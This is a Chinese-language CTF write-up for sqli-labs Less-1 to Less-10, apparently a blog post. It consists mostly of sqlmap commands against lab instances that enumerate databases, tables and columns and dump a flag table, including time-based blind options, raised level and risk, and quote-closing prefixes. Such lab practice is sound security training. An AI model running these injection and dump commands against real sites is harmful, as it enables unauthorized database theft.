当前位置: 首页 > news >正文

sqli-labs 1(Less-1-Less-10)新手解题思路 - 指南

sqli-labs 1

Less-1/ Less-2/ Less-3/ Less-4 Less-5/Less-6/Less-7Less-8/ Less-9

1、打开页面,尝试输入?id=1,?id=2…,都会有回显,所以确定这类题为sql注入,接下来我们依然来进行四部曲(暴库,暴表,暴字段,暴密码)

  1. 暴库

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' –dbs

3、暴表

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining –tables

4、暴字段

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -columns

  1. 暴flag

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -random-agent -D ctftraining -T flag flag -dump

Less-10

1、明确指定注入类型(时间盲注)

Less-10 通常需要时间盲注,可强制 sqlmap 测试该类型:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T

--technique=T:指定仅测试时间盲注(Time-based blind),跳过其他类型,提高针对性。

2、提高测试级别和风险(推荐)

默认--level=1和--risk=1测试强度较低,可提高至:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

--level=3:增加测试 payload 的数量,包括更多特殊字符和边界测试(Level 3 及以上会测试 Cookie、User-Agent 等,但这里主要针对id参数)。

--risk=2:允许使用可能影响数据完整性的 payload(如OR、UNION等,适合盲注场景)。

3. 手动指定参数闭合方式(关键)

Less-10 的id通常被单引号包裹,可手动告诉 sqlmap 闭合方式,避免其猜测错误:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T -p id --prefix "'" --suffix "--+"

-p id:明确指定测试id参数。

--prefix "'":指定参数前的闭合符为单引号(即id='1'中的单引号)。

--suffix "--+":指定参数后的注释符(--+用于注释掉后面的 SQL 语句,避免语法错误)。

4、延长时间盲注检测等待时间

若目标响应较慢,可增加延迟判断时间(默认 5 秒)

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T --time-sec=10

--time-sec=10:设置时间盲注的延迟阈值为 10 秒(即注入语句若使服务器延迟 10 秒以上,则判定为有效)。

5、本题选择提高测试级别和风险(推荐)暴库

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

6、暴表

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining --tables --level=3 --risk=2

  1. 暴字段

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag --columns --level=3 --risk=2

  1. 暴内容

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag flag --dump --level=3 --risk=2

http://www.jsqmd.com/news/46951/

相关文章:

  • PyMAF 2023 单张照片估计参数化人体
  • 实用指南:【设计模式】适配器模式(Adapter)
  • 完整教程:【人工智能】神经网络的优化器optimizer(四):Adam自适应动量优化器
  • 轻松速通:TTS播放、文件播放与录音的核心功能解析!
  • 2025 中国法兰阀门十大品牌推荐:密封升级 + 场景适配,优质厂家护航流体系统安全
  • FPGA专用CLKUSR时钟引脚严重警告——Cyclone 10 GX
  • OPCUA探讨(五)——客户端代码解读:监控变量值与报警
  • 2025 年度中国截止阀十大品牌推荐:绿色智造 + 特种工况突破,引领行业高质量发展
  • 修改DTS适配遥控用户码
  • nginx性能优化之tcp调优
  • 2025年11月安徽聚乙烯瓶、高阻隔瓶、聚酯瓶、农药瓶供应商排行榜:安徽金汇龙包装领跑行业
  • 2025年11月中国/安徽/聚乙烯瓶、高阻隔瓶、聚酯瓶、农药瓶厂家TOP10推荐:安徽金汇龙包装强势登顶
  • rich dataset 3D人体场景数据集
  • ICPC2025沈阳打铁日志
  • UModel 数据治理:运维世界模型构建实践
  • 【springboot】 WebMvcConfigurer的使用
  • 2025年11月21日
  • 实用指南:一文搞懂 DeepSeek API:兼容 OpenAI 接口的智能对话模型调用指南
  • 形容词Test
  • James Watsons
  • 2025年11月江苏/徐州vr设备、vr体验馆、5d影院、9d影院、拓普互动厂家推荐榜:拓普互动强势登顶
  • 计算机网络:物理层 - 实践
  • 2025年11月中国/江苏/徐州vr设备、vr体验馆、5d影院、9d影院、拓普互动厂家TOP10:拓普互动领跑榜单
  • MongoDB 平替新方案:金仓多模数据库驱动电子证照国产化落地 - 详解
  • 高考数学如何有效提分?一位家长关于分阶段选择数学老师的心得体会
  • 最佳加密货币钱包选择指南:企业级安全与功能全解析
  • 让 Maven 能找到本地 JAR 而无需把它上传到公共仓库:
  • Windows Server 2019 中文版、英文版下载 (2025 年 11 月更新)
  • TSMaster + SkyEye:更早、更快、更全面的数字化验证正在成为行业共识
  • 2025年11月中国/江苏/徐州MPP电力管,PE管,喷灌机管,建筑排水管,虹吸管综合评测与权威推荐榜单